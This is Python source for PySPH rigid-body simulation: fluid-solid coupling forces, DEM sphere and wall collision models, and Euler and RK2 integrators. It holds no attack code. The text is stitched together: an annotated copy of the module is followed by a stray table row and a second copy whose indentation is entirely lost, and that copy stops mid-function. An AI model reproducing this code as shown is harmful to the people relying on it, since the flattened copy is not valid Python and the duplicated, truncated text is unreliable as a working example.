    [1] 'Versatile Rigid-Fluid Coupling for Incompressible SPH'
        https://graphics.ethz.ch/~sobarbar/papers/Sol12/Sol12.pdf
    [2] 'A 3D Simulation of a Moving Solid in Viscous Free-Surface Flows
        by Coupling SPH and DEM', https://doi.org/10.1155/2017/3174904

    Note: the contributions to both phases are accumulated here in one
    pass, so make sure this equation is applied only once per pair.
    """

    def __init__(self, dest, sources):
        super(LiuFluidForce, self).__init__(dest, sources)

    def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
             s_idx, s_V, s_fx, s_fy, s_fz, DWIJ, s_m, s_p, s_rho):
        # Symmetrized pressure term p_b/rho_b^2 + p_a/rho_a^2.
        pij = s_p[s_idx] / (s_rho[s_idx]**2) + d_p[d_idx] / (d_rho[d_idx]**2)
        # Acceleration on the fluid particle.
        d_au[d_idx] -= s_m[s_idx] * pij * DWIJ[0]
        d_av[d_idx] -= s_m[s_idx] * pij * DWIJ[1]
        d_aw[d_idx] -= s_m[s_idx] * pij * DWIJ[2]
        # Equal and opposite force on the solid particle.
        s_fx[s_idx] += d_m[d_idx] * s_m[s_idx] * pij * DWIJ[0]
        s_fy[s_idx] += d_m[d_idx] * s_m[s_idx] * pij * DWIJ[1]
        s_fz[s_idx] += d_m[d_idx] * s_m[s_idx] * pij * DWIJ[2]
class RigidBodyForceGPUGems(Equation):
    """Penalty-style particle-particle repulsion with normal and
    tangential damping for rigid bodies.

    Inspired from
    http://http.developer.nvidia.com/GPUGems3/gpugems3_ch29.html
    and BK Mishra's article on DEM,
    http://dx.doi.org/10.1016/S0301-7516(03)00032-2,
    'A review of computer simulation of tumbling mills by the discrete
    element method: Part I - contact mechanics'.
    """

    def __init__(self, dest, sources, k=1.0, d=1.0, eta=1.0, kt=1.0):
        """Note that ``d`` is a factor multiplied with the "h" of the
        particle.

        Parameters
        ----------
        k : float
            Repulsion spring constant.
        d : float
            Interaction distance as a multiple of the particle ``h``.
        eta : float
            Normal damping coefficient.
        kt : float
            Tangential damping coefficient.
        """
        self.k = k
        self.d = d
        self.eta = eta
        self.kt = kt
        super(RigidBodyForceGPUGems, self).__init__(dest, sources)

    def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, XIJ,
             RIJ, R2IJ, VIJ):
        vdotr = VIJ[0]*XIJ[0] + VIJ[1]*XIJ[1] + VIJ[2]*XIJ[2]
        # Unit normal and normalized approach speed; guard against the
        # coincident-particle singularity.
        if RIJ > 1e-9:
            vdotr_r2 = vdotr/R2IJ
            nx = XIJ[0]/RIJ
            ny = XIJ[1]/RIJ
            nz = XIJ[2]/RIJ
        else:
            vdotr_r2 = 0.0
            nx = 0.0
            ny = 0.0
            nz = 0.0
        # Tangential part of the relative velocity.
        vtx = VIJ[0] - vdotr_r2*XIJ[0]
        vty = VIJ[1] - vdotr_r2*XIJ[1]
        vtz = VIJ[2] - vdotr_r2*XIJ[2]
        # Spring force is active only inside the interaction distance.
        dist = self.d*d_h[d_idx]
        fac = self.k*d_total_mass[0]/dist*max(dist - RIJ, 0.0)
        d_fx[d_idx] += fac*nx - self.eta*VIJ[0] - self.kt*vtx
        d_fy[d_idx] += fac*ny - self.eta*VIJ[1] - self.kt*vty
        d_fz[d_idx] += fac*nz - self.eta*VIJ[2] - self.kt*vtz
class RigidBodyCollision(Equation):
    """Force between two spheres is implemented using DEM contact force law.

    Refer https://doi.org/10.1016/j.powtec.2011.09.019 for more
    information.

    Open-source MFIX-DEM software for gas–solids flows:
    Part I—Verification studies .
    """
    def __init__(self, dest, sources, kn=1e3, mu=0.5, en=0.8):
        """Initialise the required coefficients for force calculation.

        Keyword arguments:
        kn -- Normal spring stiffness (default 1e3)
        mu -- friction coefficient (default 0.5)
        en -- coefficient of restitution (0.8)

        Given these coefficients, tangential spring stiffness, normal and
        tangential damping coefficient are calculated by default.
        """
        self.kn = kn
        self.kt = 2. / 7. * kn
        # NOTE(review): effective mass is hard-coded -- presumably for a
        # particular reference sphere (pi * 0.5^2 * 1e-6 * 2120); confirm
        # against the intended particle size/density before reuse.
        m_eff = np.pi * 0.5**2 * 1e-6 * 2120
        self.gamma_n = -(2 * np.sqrt(kn * m_eff) * np.log(en)) / (
            np.sqrt(np.pi**2 + np.log(en)**2))
        self.gamma_t = 0.5 * self.gamma_n
        self.mu = mu
        super(RigidBodyCollision, self).__init__(dest, sources)

    def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, d_rad_s,
             d_tang_disp_x, d_tang_disp_y, d_tang_disp_z, d_tang_velocity_x,
             d_tang_velocity_y, d_tang_velocity_z, s_idx, s_rad_s, XIJ, RIJ,
             R2IJ, VIJ):
        # Overlap of the two spheres; <= 0 means no contact.
        overlap = 0
        if RIJ > 1e-9:
            overlap = d_rad_s[d_idx] + s_rad_s[s_idx] - RIJ
        if overlap > 0:
            # normal vector passing from particle i to j
            nij_x = -XIJ[0] / RIJ
            nij_y = -XIJ[1] / RIJ
            nij_z = -XIJ[2] / RIJ
            # overlap speed: a scalar
            vijdotnij = VIJ[0] * nij_x + VIJ[1] * nij_y + VIJ[2] * nij_z
            # normal velocity
            vijn_x = vijdotnij * nij_x
            vijn_y = vijdotnij * nij_y
            vijn_z = vijdotnij * nij_z
            # normal force with conservative and dissipation part
            fn_x = -self.kn * overlap * nij_x - self.gamma_n * vijn_x
            fn_y = -self.kn * overlap * nij_y - self.gamma_n * vijn_y
            fn_z = -self.kn * overlap * nij_z - self.gamma_n * vijn_z
            # ----------------------Tangential force---------------------- #
            # tangential velocity
            d_tang_velocity_x[d_idx] = VIJ[0] - vijn_x
            d_tang_velocity_y[d_idx] = VIJ[1] - vijn_y
            d_tang_velocity_z[d_idx] = VIJ[2] - vijn_z
            dtvx = d_tang_velocity_x[d_idx]
            dtvy = d_tang_velocity_y[d_idx]
            dtvz = d_tang_velocity_z[d_idx]
            _tang = sqrt(dtvx*dtvx + dtvy*dtvy + dtvz*dtvz)
            # tangential unit vector
            tij_x = 0
            tij_y = 0
            tij_z = 0
            if _tang > 0:
                tij_x = d_tang_velocity_x[d_idx] / _tang
                tij_y = d_tang_velocity_y[d_idx] / _tang
                tij_z = d_tang_velocity_z[d_idx] / _tang
            # damping force or dissipation
            ft_x_d = -self.gamma_t * d_tang_velocity_x[d_idx]
            ft_y_d = -self.gamma_t * d_tang_velocity_y[d_idx]
            ft_z_d = -self.gamma_t * d_tang_velocity_z[d_idx]
            # tangential spring force
            ft_x_s = -self.kt * d_tang_disp_x[d_idx]
            ft_y_s = -self.kt * d_tang_disp_y[d_idx]
            ft_z_s = -self.kt * d_tang_disp_z[d_idx]
            ft_x = ft_x_d + ft_x_s
            ft_y = ft_y_d + ft_y_s
            ft_z = ft_z_d + ft_z_s
            # coulomb law: cap the tangential force at mu * |normal force|
            ftij = sqrt((ft_x**2) + (ft_y**2) + (ft_z**2))
            fnij = sqrt((fn_x**2) + (fn_y**2) + (fn_z**2))
            _fnij = self.mu * fnij
            if _fnij < ftij:
                ft_x = -_fnij * tij_x
                ft_y = -_fnij * tij_y
                ft_z = -_fnij * tij_z
            d_fx[d_idx] += fn_x + ft_x
            d_fy[d_idx] += fn_y + ft_y
            d_fz[d_idx] += fn_z + ft_z
        else:
            # No contact: reset the tangential history for this particle.
            d_tang_velocity_x[d_idx] = 0
            d_tang_velocity_y[d_idx] = 0
            d_tang_velocity_z[d_idx] = 0
            d_tang_disp_x[d_idx] = 0
            d_tang_disp_y[d_idx] = 0
            d_tang_disp_z[d_idx] = 0
class RigidBodyWallCollision(Equation):
    """Force between sphere and a wall is implemented using
    DEM contact force law.

    Refer https://doi.org/10.1016/j.powtec.2011.09.019 for more
    information.

    Open-source MFIX-DEM software for gas–solids flows:
    Part I—Verification studies .
    """
    def __init__(self, dest, sources, kn=1e3, mu=0.5, en=0.8):
        """Initialise the required coefficients for force calculation.

        Keyword arguments:
        kn -- Normal spring stiffness (default 1e3)
        mu -- friction coefficient (default 0.5)
        en -- coefficient of restitution (0.8)

        Given these coefficients, tangential spring stiffness, normal and
        tangential damping coefficient are calculated by default.
        """
        self.kn = kn
        self.kt = 2. / 7. * kn
        # NOTE(review): effective mass is hard-coded, identical to
        # RigidBodyCollision above -- confirm it matches the intended
        # particle size/density before reuse.
        m_eff = np.pi * 0.5**2 * 1e-6 * 2120
        self.gamma_n = -(2 * np.sqrt(kn * m_eff) * np.log(en)) / (
            np.sqrt(np.pi**2 + np.log(en)**2))
        # (A stray debug ``print(self.gamma_n)`` was removed here.)
        self.gamma_t = 0.5 * self.gamma_n
        self.mu = mu
        super(RigidBodyWallCollision, self).__init__(dest, sources)

    def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, d_rad_s,
             d_tang_disp_x, d_tang_disp_y, d_tang_disp_z, d_tang_velocity_x,
             d_tang_velocity_y, d_tang_velocity_z, s_idx, XIJ, RIJ,
             R2IJ, VIJ, s_nx, s_ny, s_nz):
        # check overlap amount: penetration of the sphere past the wall
        # plane defined by the wall particle's outward normal (s_nx, ...).
        overlap = d_rad_s[d_idx] - (XIJ[0] * s_nx[s_idx] + XIJ[1] *
                                    s_ny[s_idx] + XIJ[2] * s_nz[s_idx])
        if overlap > 0:
            # basic variables: normal vector (into the wall)
            nij_x = -s_nx[s_idx]
            nij_y = -s_ny[s_idx]
            nij_z = -s_nz[s_idx]
            # overlap speed: a scalar
            vijdotnij = VIJ[0] * nij_x + VIJ[1] * nij_y + VIJ[2] * nij_z
            # normal velocity
            vijn_x = vijdotnij * nij_x
            vijn_y = vijdotnij * nij_y
            vijn_z = vijdotnij * nij_z
            # normal force with conservative and dissipation part
            fn_x = -self.kn * overlap * nij_x - self.gamma_n * vijn_x
            fn_y = -self.kn * overlap * nij_y - self.gamma_n * vijn_y
            fn_z = -self.kn * overlap * nij_z - self.gamma_n * vijn_z
            # ----------------------Tangential force---------------------- #
            # tangential velocity
            d_tang_velocity_x[d_idx] = VIJ[0] - vijn_x
            d_tang_velocity_y[d_idx] = VIJ[1] - vijn_y
            d_tang_velocity_z[d_idx] = VIJ[2] - vijn_z
            # use sqrt for consistency with RigidBodyCollision above
            _tang = sqrt(
                (d_tang_velocity_x[d_idx]**2) + (d_tang_velocity_y[d_idx]**2) +
                (d_tang_velocity_z[d_idx]**2))
            # tangential unit vector
            tij_x = 0
            tij_y = 0
            tij_z = 0
            if _tang > 0:
                tij_x = d_tang_velocity_x[d_idx] / _tang
                tij_y = d_tang_velocity_y[d_idx] / _tang
                tij_z = d_tang_velocity_z[d_idx] / _tang
            # damping force or dissipation
            ft_x_d = -self.gamma_t * d_tang_velocity_x[d_idx]
            ft_y_d = -self.gamma_t * d_tang_velocity_y[d_idx]
            ft_z_d = -self.gamma_t * d_tang_velocity_z[d_idx]
            # tangential spring force
            ft_x_s = -self.kt * d_tang_disp_x[d_idx]
            ft_y_s = -self.kt * d_tang_disp_y[d_idx]
            ft_z_s = -self.kt * d_tang_disp_z[d_idx]
            ft_x = ft_x_d + ft_x_s
            ft_y = ft_y_d + ft_y_s
            ft_z = ft_z_d + ft_z_s
            # coulomb law: cap the tangential force at mu * |normal force|
            ftij = sqrt((ft_x**2) + (ft_y**2) + (ft_z**2))
            fnij = sqrt((fn_x**2) + (fn_y**2) + (fn_z**2))
            _fnij = self.mu * fnij
            if _fnij < ftij:
                ft_x = -_fnij * tij_x
                ft_y = -_fnij * tij_y
                ft_z = -_fnij * tij_z
            d_fx[d_idx] += fn_x + ft_x
            d_fy[d_idx] += fn_y + ft_y
            d_fz[d_idx] += fn_z + ft_z
        else:
            # No contact: reset the tangential history for this particle.
            d_tang_velocity_x[d_idx] = 0
            d_tang_velocity_y[d_idx] = 0
            d_tang_velocity_z[d_idx] = 0
            d_tang_disp_x[d_idx] = 0
            d_tang_disp_y[d_idx] = 0
            d_tang_disp_z[d_idx] = 0
class EulerStepRigidBody(IntegratorStep):
    """Single-stage forward Euler integrator for rigid bodies.

    Fast but inaccurate; intended for testing.
    """
    def initialize(self):
        pass

    def stage1(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z,
               d_omega, d_omega_dot, d_vc, d_ac, d_num_body,
               dt=0.0):
        i = declare('int')
        j = declare('int')
        base = declare('int')
        # Shared per-body state is advanced once, by the first particle.
        if d_idx == 0:
            for i in range(d_num_body[0]):
                base = 3*i
                for j in range(3):
                    d_vc[base + j] = d_vc[base + j] + d_ac[base + j]*dt
                    d_omega[base + j] = (d_omega[base + j] +
                                         d_omega_dot[base + j]*dt)
        # Every particle advances its own position with its velocity.
        d_x[d_idx] = d_x[d_idx] + dt*d_u[d_idx]
        d_y[d_idx] = d_y[d_idx] + dt*d_v[d_idx]
        d_z[d_idx] = d_z[d_idx] + dt*d_w[d_idx]
class RK2StepRigidBody(IntegratorStep):
    """Two-stage (midpoint) Runge-Kutta integrator for rigid bodies.

    ``initialize`` snapshots positions and the per-body velocities;
    ``stage1`` advances by dt/2 from the snapshot and ``stage2`` advances
    by the full dt from the same snapshot using the midpoint rates.
    """
    def initialize(self, d_idx, d_x, d_y, d_z, d_x0, d_y0, d_z0,
                   d_omega, d_omega0, d_vc, d_vc0, d_num_body):
        _i = declare('int')
        _j = declare('int')
        base = declare('int')
        # Shared per-body state is snapshotted once, by the first particle.
        if d_idx == 0:
            for _i in range(d_num_body[0]):
                base = 3*_i
                for _j in range(3):
                    d_vc0[base + _j] = d_vc[base + _j]
                    d_omega0[base + _j] = d_omega[base + _j]
        # Every particle snapshots its own position.
        d_x0[d_idx] = d_x[d_idx]
        d_y0[d_idx] = d_y[d_idx]
        d_z0[d_idx] = d_z[d_idx]

    def stage1(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z, d_x0, d_y0, d_z0,
               d_omega, d_omega_dot, d_vc, d_ac, d_omega0, d_vc0, d_num_body,
               dt=0.0):
        # Half step: advance from the snapshot by dt/2.
        dtb2 = 0.5*dt
        _i = declare('int')
        j = declare('int')
        base = declare('int')
        if d_idx == 0:
            for _i in range(d_num_body[0]):
                base = 3*_i
                for j in range(3):
                    d_vc[base + j] = d_vc0[base + j] + d_ac[base + j]*dtb2
                    d_omega[base + j] = (d_omega0[base + j] +
                                         d_omega_dot[base + j]*dtb2)
        d_x[d_idx] = d_x0[d_idx] + dtb2*d_u[d_idx]
        d_y[d_idx] = d_y0[d_idx] + dtb2*d_v[d_idx]
        d_z[d_idx] = d_z0[d_idx] + dtb2*d_w[d_idx]

    def stage2(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z, d_x0, d_y0, d_z0,
               d_omega, d_omega_dot, d_vc, d_ac, d_omega0, d_vc0, d_num_body,
               dt=0.0):
        # Full step: advance from the snapshot by dt using midpoint rates.
        _i = declare('int')
        j = declare('int')
        base = declare('int')
        if d_idx == 0:
            for _i in range(d_num_body[0]):
                base = 3*_i
                for j in range(3):
                    d_vc[base + j] = d_vc0[base + j] + d_ac[base + j]*dt
                    d_omega[base + j] = (d_omega0[base + j] +
                                         d_omega_dot[base + j]*dt)
        d_x[d_idx] = d_x0[d_idx] + dt*d_u[d_idx]
        d_y[d_idx] = d_y0[d_idx] + dt*d_v[d_idx]
        d_z[d_idx] = d_z0[d_idx] + dt*d_w[d_idx]
| 34.666667 | 79 | 0.531877 |
from pysph.base.reduce_array import parallel_reduce_array
from pysph.sph.equation import Equation
from pysph.sph.integrator_step import IntegratorStep
import numpy as np
import numpy
from math import sqrt
def skew(vec):
import sympy as S
x, y, z = vec[0], vec[1], vec[2]
return S.Matrix([[0, -z, y], [z, 0, -x], [-y, x, 0]])
def get_alpha_dot():
import sympy as S
ixx, iyy, izz, ixy, ixz, iyz = S.symbols("ixx, iyy, izz, ixy, ixz, iyz")
tx, ty, tz = S.symbols("tx, ty, tz")
wx, wy, wz = S.symbols('wx, wy, wz')
tau = S.Matrix([tx, ty, tz])
I = S.Matrix([[ixx, ixy, ixz], [ixy, iyy, iyz], [ixz, iyz, izz]])
w = S.Matrix([wx, wy, wz])
Iinv = I.inv()
Iinv.simplify()
res = Iinv*(tau - w.cross(I*w))
res.simplify()
syms, result = S.cse(res, symbols=S.numbered_symbols('tmp'))
for lhs, rhs in syms:
print("%s = %s" % (lhs, rhs))
for i in range(3):
print("omega_dot[%d] =" % i, result[0][i])
def get_torque():
import sympy as S
x, y, z, fx, fy, fz = S.symbols("x, y, z, fx, fy, fz")
R = S.Matrix([x, y, z])
F = S.Matrix([fx, fy, fz])
print("Torque:", R.cross(F))
cx, cy, cz = S.symbols('cx, cy, cz')
d = S.Matrix([cx, cy, cz])
print("c_m x f = ", d.cross(F))
wx, wy, wz = S.symbols('wx, wy, wz')
rx, ry, rz = S.symbols('rx, ry, rz')
w = S.Matrix([wx, wy, wz])
r = S.Matrix([rx, ry, rz])
print("w x r = %s" % w.cross(r))
def declare(*args): pass
class RigidBodyMoments(Equation):
def reduce(self, dst, t, dt):
nbody = declare('int')
i = declare('int')
base_mi = declare('int')
base = declare('int')
nbody = dst.num_body[0]
if dst.gpu:
dst.gpu.pull('omega', 'x', 'y', 'z', 'fx', 'fy', 'fz')
d_mi = declare('object')
m = declare('object')
x = declare('object')
y = declare('object')
z = declare('object')
fx = declare('object')
fy = declare('object')
fz = declare('object')
d_mi = dst.mi
cond = declare('object')
for i in range(nbody):
cond = dst.body_id == i
base = i*16
m = dst.m[cond]
x = dst.x[cond]
y = dst.y[cond]
z = dst.z[cond]
d_mi[base + 0] = numpy.sum(m)
d_mi[base + 1] = numpy.sum(m*x)
d_mi[base + 2] = numpy.sum(m*y)
d_mi[base + 3] = numpy.sum(m*z)
d_mi[base + 4] = numpy.sum(m*(y*y + z*z))
d_mi[base + 5] = numpy.sum(m*(x*x + z*z))
d_mi[base + 6] = numpy.sum(m*(x*x + y*y))
d_mi[base + 7] = -numpy.sum(m*x*y)
d_mi[base + 8] = -numpy.sum(m*x*z)
d_mi[base + 9] = -numpy.sum(m*y*z)
fx = dst.fx[cond]
fy = dst.fy[cond]
fz = dst.fz[cond]
d_mi[base + 10] = numpy.sum(fx)
d_mi[base + 11] = numpy.sum(fy)
d_mi[base + 12] = numpy.sum(fz)
d_mi[base + 13] = numpy.sum(y*fz - z*fy)
d_mi[base + 14] = numpy.sum(z*fx - x*fz)
d_mi[base + 15] = numpy.sum(x*fy - y*fx)
d_mi[:] = parallel_reduce_array(dst.mi)
for i in range(nbody):
base_mi = i*16
base = i*3
m = d_mi[base_mi + 0]
dst.total_mass[i] = m
cx = d_mi[base_mi + 1]/m
cy = d_mi[base_mi + 2]/m
cz = d_mi[base_mi + 3]/m
dst.cm[base + 0] = cx
dst.cm[base + 1] = cy
dst.cm[base + 2] = cz
ixx = d_mi[base_mi + 4] - (cy*cy + cz*cz)*m
iyy = d_mi[base_mi + 5] - (cx*cx + cz*cz)*m
izz = d_mi[base_mi + 6] - (cx*cx + cy*cy)*m
ixy = d_mi[base_mi + 7] + cx*cy*m
ixz = d_mi[base_mi + 8] + cx*cz*m
iyz = d_mi[base_mi + 9] + cy*cz*m
d_mi[base_mi + 0] = ixx
d_mi[base_mi + 1] = ixy
d_mi[base_mi + 2] = ixz
d_mi[base_mi + 3] = ixy
d_mi[base_mi + 4] = iyy
d_mi[base_mi + 5] = iyz
d_mi[base_mi + 6] = ixz
d_mi[base_mi + 7] = iyz
d_mi[base_mi + 8] = izz
fx = d_mi[base_mi + 10]
fy = d_mi[base_mi + 11]
fz = d_mi[base_mi + 12]
dst.force[base + 0] = fx
dst.force[base + 1] = fy
dst.force[base + 2] = fz
dst.ac[base + 0] = fx/m
dst.ac[base + 1] = fy/m
dst.ac[base + 2] = fz/m
tx = d_mi[base_mi + 13]
ty = d_mi[base_mi + 14]
tz = d_mi[base_mi + 15]
tx -= cy*fz - cz*fy
ty -= -cx*fz + cz*fx
tz -= cx*fy - cy*fx
dst.torque[base + 0] = tx
dst.torque[base + 1] = ty
dst.torque[base + 2] = tz
wx = dst.omega[base + 0]
wy = dst.omega[base + 1]
wz = dst.omega[base + 2]
tmp0 = iyz**2
tmp1 = ixy**2
tmp2 = ixz**2
tmp3 = ixx*iyy
tmp4 = ixy*ixz
tmp5 = 1./(ixx*tmp0 + iyy*tmp2 - 2*iyz*tmp4 + izz*tmp1 - izz*tmp3)
tmp6 = ixy*izz - ixz*iyz
tmp7 = ixz*wx + iyz*wy + izz*wz
tmp8 = ixx*wx + ixy*wy + ixz*wz
tmp9 = tmp7*wx - tmp8*wz + ty
tmp10 = ixy*iyz - ixz*iyy
tmp11 = ixy*wx + iyy*wy + iyz*wz
tmp12 = -tmp11*wx + tmp8*wy + tz
tmp13 = tmp11*wz - tmp7*wy + tx
tmp14 = ixx*iyz - tmp4
dst.omega_dot[base + 0] = tmp5*(-tmp10*tmp12 -
tmp13*(iyy*izz - tmp0) + tmp6*tmp9)
dst.omega_dot[base + 1] = tmp5*(tmp12*tmp14 +
tmp13*tmp6 - tmp9*(ixx*izz - tmp2))
dst.omega_dot[base + 2] = tmp5*(-tmp10*tmp13 -
tmp12*(-tmp1 + tmp3) + tmp14*tmp9)
if dst.gpu:
dst.gpu.push(
'total_mass', 'mi', 'cm', 'force', 'ac', 'torque',
'omega_dot'
)
class RigidBodyMotion(Equation):
def initialize(self, d_idx, d_x, d_y, d_z, d_u, d_v, d_w,
d_cm, d_vc, d_ac, d_omega, d_body_id):
base = declare('int')
base = d_body_id[d_idx]*3
wx = d_omega[base + 0]
wy = d_omega[base + 1]
wz = d_omega[base + 2]
rx = d_x[d_idx] - d_cm[base + 0]
ry = d_y[d_idx] - d_cm[base + 1]
rz = d_z[d_idx] - d_cm[base + 2]
d_u[d_idx] = d_vc[base + 0] + wy*rz - wz*ry
d_v[d_idx] = d_vc[base + 1] + wz*rx - wx*rz
d_w[d_idx] = d_vc[base + 2] + wx*ry - wy*rx
class BodyForce(Equation):
def __init__(self, dest, sources, gx=0.0, gy=0.0, gz=0.0):
self.gx = gx
self.gy = gy
self.gz = gz
super(BodyForce, self).__init__(dest, sources)
def initialize(self, d_idx, d_m, d_fx, d_fy, d_fz, d_num_body, d_mi):
d_fx[d_idx] = d_m[d_idx]*self.gx
d_fy[d_idx] = d_m[d_idx]*self.gy
d_fz[d_idx] = d_m[d_idx]*self.gz
class SummationDensityBoundary(Equation):
def __init__(self, dest, sources, fluid_rho=1000.0):
self.fluid_rho = fluid_rho
super(SummationDensityBoundary, self).__init__(dest, sources)
def loop(self, d_idx, d_rho, s_idx, s_m, s_V, WIJ):
d_rho[d_idx] += self.fluid_rho * s_V[s_idx] * WIJ
class NumberDensity(Equation):
def initialize(self, d_idx, d_V):
d_V[d_idx] = 0.0
def loop(self, d_idx, d_V, WIJ):
d_V[d_idx] += WIJ
class SummationDensityRigidBody(Equation):
def __init__(self, dest, sources, rho0):
self.rho0 = rho0
super(SummationDensityRigidBody, self).__init__(dest, sources)
def initialize(self, d_idx, d_rho):
d_rho[d_idx] = 0.0
def loop(self, d_idx, d_rho, s_idx, s_V, WIJ):
d_rho[d_idx] += self.rho0/s_V[s_idx]*WIJ
class ViscosityRigidBody(Equation):
def __init__(self, dest, sources, rho0, nu):
self.nu = nu
self.rho0 = rho0
super(ViscosityRigidBody, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_au, d_av, d_aw, d_rho,
s_idx, s_V, s_fx, s_fy, s_fz,
EPS, VIJ, XIJ, R2IJ, DWIJ):
phi_b = self.rho0/(s_V[s_idx]*d_rho[d_idx])
vijdotxij = min(VIJ[0]*XIJ[0] + VIJ[1]*XIJ[1] + VIJ[2]*XIJ[2], 0.0)
fac = self.nu*phi_b*vijdotxij/(R2IJ + EPS)
ax = fac*DWIJ[0]
ay = fac*DWIJ[1]
az = fac*DWIJ[2]
d_au[d_idx] += ax
d_av[d_idx] += ay
d_aw[d_idx] += az
s_fx[s_idx] += -d_m[d_idx]*ax
s_fy[s_idx] += -d_m[d_idx]*ay
s_fz[s_idx] += -d_m[d_idx]*az
class PressureRigidBody(Equation):
def __init__(self, dest, sources, rho0):
self.rho0 = rho0
super(PressureRigidBody, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ):
rho1 = 1.0/d_rho[d_idx]
fac = -d_p[d_idx]*rho1*rho1*self.rho0/s_V[s_idx]
ax = fac*DWIJ[0]
ay = fac*DWIJ[1]
az = fac*DWIJ[2]
d_au[d_idx] += ax
d_av[d_idx] += ay
d_aw[d_idx] += az
s_fx[s_idx] += -d_m[d_idx]*ax
s_fy[s_idx] += -d_m[d_idx]*ay
s_fz[s_idx] += -d_m[d_idx]*az
class AkinciRigidFluidCoupling(Equation):
def __init__(self, dest, sources, fluid_rho=1000):
super(AkinciRigidFluidCoupling, self).__init__(dest, sources)
self.fluid_rho = fluid_rho
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ, s_m, s_p, s_rho):
psi = s_V[s_idx] * self.fluid_rho
_t1 = 2 * d_p[d_idx] / (d_rho[d_idx]**2)
d_au[d_idx] += -psi * _t1 * DWIJ[0]
d_av[d_idx] += -psi * _t1 * DWIJ[1]
d_aw[d_idx] += -psi * _t1 * DWIJ[2]
s_fx[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[0]
s_fy[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[1]
s_fz[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[2]
class LiuFluidForce(Equation):
def __init__(self, dest, sources):
super(LiuFluidForce, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ, s_m, s_p, s_rho):
_t1 = s_p[s_idx] / (s_rho[s_idx]**2) + d_p[d_idx] / (d_rho[d_idx]**2)
d_au[d_idx] += -s_m[s_idx] * _t1 * DWIJ[0]
d_av[d_idx] += -s_m[s_idx] * _t1 * DWIJ[1]
d_aw[d_idx] += -s_m[s_idx] * _t1 * DWIJ[2]
s_fx[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[0]
s_fy[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[1]
s_fz[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[2]
class RigidBodyForceGPUGems(Equation):
def __init__(self, dest, sources, k=1.0, d=1.0, eta=1.0, kt=1.0):
self.k = k
self.d = d
self.eta = eta
self.kt = kt
super(RigidBodyForceGPUGems, self).__init__(dest, sources)
def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, XIJ,
RIJ, R2IJ, VIJ):
vijdotrij = VIJ[0]*XIJ[0] + VIJ[1]*XIJ[1] + VIJ[2]*XIJ[2]
if RIJ > 1e-9:
vijdotrij_r2ij = vijdotrij/R2IJ
nij_x = XIJ[0]/RIJ
nij_y = XIJ[1]/RIJ
nij_z = XIJ[2]/RIJ
else:
vijdotrij_r2ij = 0.0
nij_x = 0.0
nij_y = 0.0
nij_z = 0.0
vijt_x = VIJ[0] - vijdotrij_r2ij*XIJ[0]
vijt_y = VIJ[1] - vijdotrij_r2ij*XIJ[1]
vijt_z = VIJ[2] - vijdotrij_r2ij*XIJ[2]
d = self.d*d_h[d_idx]
fac = self.k*d_total_mass[0]/d*max(d - RIJ, 0.0)
d_fx[d_idx] += fac*nij_x - self.eta*VIJ[0] - self.kt*vijt_x
d_fy[d_idx] += fac*nij_y - self.eta*VIJ[1] - self.kt*vijt_y
d_fz[d_idx] += fac*nij_z - self.eta*VIJ[2] - self.kt*vijt_z
class RigidBodyCollision(Equation):
def __init__(self, dest, sources, kn=1e3, mu=0.5, en=0.8):
self.kn = kn
self.kt = 2. / 7. * kn
m_eff = np.pi * 0.5**2 * 1e-6 * 2120
self.gamma_n = -(2 * np.sqrt(kn * m_eff) * np.log(en)) / (
np.sqrt(np.pi**2 + np.log(en)**2))
self.gamma_t = 0.5 * self.gamma_n
self.mu = mu
super(RigidBodyCollision, self).__init__(dest, sources)
def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, d_rad_s,
d_tang_disp_x, d_tang_disp_y, d_tang_disp_z, d_tang_velocity_x,
d_tang_velocity_y, d_tang_velocity_z, s_idx, s_rad_s, XIJ, RIJ,
R2IJ, VIJ):
overlap = 0
if RIJ > 1e-9:
overlap = d_rad_s[d_idx] + s_rad_s[s_idx] - RIJ
if overlap > 0:
nij_x = -XIJ[0] / RIJ
nij_y = -XIJ[1] / RIJ
nij_z = -XIJ[2] / RIJ
vijdotnij = VIJ[0] * nij_x + VIJ[1] * nij_y + VIJ[2] * nij_z
vijn_x = vijdotnij * nij_x
vijn_y = vijdotnij * nij_y
vijn_z = vijdotnij * nij_z
fn_x = -self.kn * overlap * nij_x - self.gamma_n * vijn_x
fn_y = -self.kn * overlap * nij_y - self.gamma_n * vijn_y
fn_z = -self.kn * overlap * nij_z - self.gamma_n * vijn_z
d_tang_velocity_x[d_idx] = VIJ[0] - vijn_x
d_tang_velocity_y[d_idx] = VIJ[1] - vijn_y
d_tang_velocity_z[d_idx] = VIJ[2] - vijn_z
dtvx = d_tang_velocity_x[d_idx]
dtvy = d_tang_velocity_y[d_idx]
dtvz = d_tang_velocity_z[d_idx]
_tang = sqrt(dtvx*dtvx + dtvy*dtvy + dtvz*dtvz)
tij_x = 0
tij_y = 0
tij_z = 0
if _tang > 0:
tij_x = d_tang_velocity_x[d_idx] / _tang
tij_y = d_tang_velocity_y[d_idx] / _tang
tij_z = d_tang_velocity_z[d_idx] / _tang
ft_x_d = -self.gamma_t * d_tang_velocity_x[d_idx]
ft_y_d = -self.gamma_t * d_tang_velocity_y[d_idx]
